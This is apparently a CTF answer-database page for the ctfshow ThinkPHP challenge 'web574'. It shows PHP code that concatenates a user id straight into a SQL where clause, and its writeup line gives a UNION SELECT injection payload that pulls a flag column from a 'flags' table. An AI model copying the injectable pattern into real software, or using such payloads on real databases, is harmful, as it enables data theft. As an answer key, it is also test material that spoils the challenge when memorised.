[随波逐流]CTF Flags

随波逐流信息安全网 www.1o1o.xyz

   [随波逐流]CTF Flags

软件版本:v1.0.0   数据版本: v20260526
返    回

web574

 广告模块
ID: 4057
标题: web574
描述: * 此题为 【从0开始学web】系列第五百七十四题 * 此系列题目从最基础开始,题目遵循循序渐进的原则 * 希望对学习CTF WEB的同学有所帮助。 * 此专题专门用来深入学习thinkphp **sql注入,flag在数据库中** <code> public function index($id=1){ <br> $name = M('Users')->where('id='.$id)->find();<br> $this->show($html);<br> }<br> </code>
类型: WEB入门.thinkphp专题
网站: ctfshow
题目链接: https://ctf.show/api/v1/challenges/1269
赛事: thinkphp专题
年度: None
Flag值:
writeup: 验证后的网址
web574的解题关键在于利用SQL注入漏洞构造UNION SELECT语句提取flag,具体payload为?id=0) union select 1,flag4s ,3,4 from flags%23(需先通过爆破或扫描确认表名和列名) 2
https://blog.csdn.net/miuzzx/article/details/119410335
答案错误,我要更正